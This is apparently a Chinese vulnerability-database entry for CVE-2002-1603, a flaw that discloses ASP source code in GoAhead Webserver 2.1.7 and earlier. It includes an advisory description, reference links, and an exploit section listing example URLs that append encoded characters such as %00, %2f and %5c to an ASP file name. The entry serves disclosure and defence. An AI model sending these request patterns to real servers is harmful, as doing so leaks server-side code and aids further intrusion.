GoAhead Webserver ASP脚本文件源代码泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107137 漏洞类型 其他
发布时间 2002-12-17 更新时间 2009-02-10
CVE编号 CVE-2002-1603 CNNVD-ID CNNVD-200202-008
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/23446
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200202-008
|漏洞详情
GoAheadWebServer是美国Embedthis公司的一款小巧的嵌入式Web服务器,它支持嵌入到各种设备和应用程序中。GoAheadWebServer未能充分过滤HTTP请求,远程攻击者可以利用这个漏洞获得ASP脚本代码的源代码信息。GoAheadWebServer支持ASP文件的执行,攻击者通过在ASP文件后增加部分URL编码字符,如'%00,%2f,%5c,/',就会导致服务程序返回包含源代码数据的信息给攻击者。攻击者利用这些信息可进一步对系统进行攻击。
|漏洞EXP
source: http://www.securityfocus.com/bid/9239/info

A vulnerability in GoAhead webserver may result in the disclosure of the source code of ASP script files. The vulnerability occurs because the application fails to sanitize HTTP requests.

An attacker can append certain characters to the end of an HTTP request for a specific ASP file. As a result, GoAhead webserver will disclose the contents of the requested ASP script file to the attacker.

This issue affects GoAhead 2.1.7 and earlier. 

http://www.example.com/asp.asp%00
http://www.example.com/asp.asp%2f
http://www.example.com/asp.asp%5c
http://www.example.com/asp.asp/
http://www.example.com/asp.asp
|参考资料

来源:US-CERTVulnerabilityNote:VU#975041
名称:VU#975041
链接:http://www.kb.cert.org/vuls/id/975041
来源:US-CERTVulnerabilityNote:VU#124059
名称:VU#124059
链接:http://www.kb.cert.org/vuls/id/124059
来源:XF
名称:goahead-script-source-disclosure(10885)
链接:http://xforce.iss.net/xforce/xfdb/10885
来源:BID
名称:9239
链接:http://www.securityfocus.com/bid/9239
来源:www.procheckup.com
链接:http://www.procheckup.com/PDFs/ProCheckUp_Vulns_2002.pdf
来源:www.kb.cert.org
链接:http://www.kb.cert.org/vuls/id/RGII-7MWKZ3
来源:SECTRACK
名称:1005820
链接:http://securitytracker.com/id?1005820
来源:rockwellautomation.custhelp.com
链接:http://rockwellautomation.custhelp.com/cgi-bin/rockwellautomation.cfg/php/enduser/std_adp.php?p_faqid=57729
来源:data.goahead.com
链接:http://data.goahead.com/Software/Webserver/2.1.8/release.htm#bug-with-urls-like-asp
来源:aluigi.altervista.org
链接:http://aluigi.altervista.org/adv/goahead-adv3.txt
来源:OSVDB
名称:13295
链接:http://www.osvdb.org/13295
来源:SECUNIA
名称:7741
链接:http://secunia.com/advisories/7741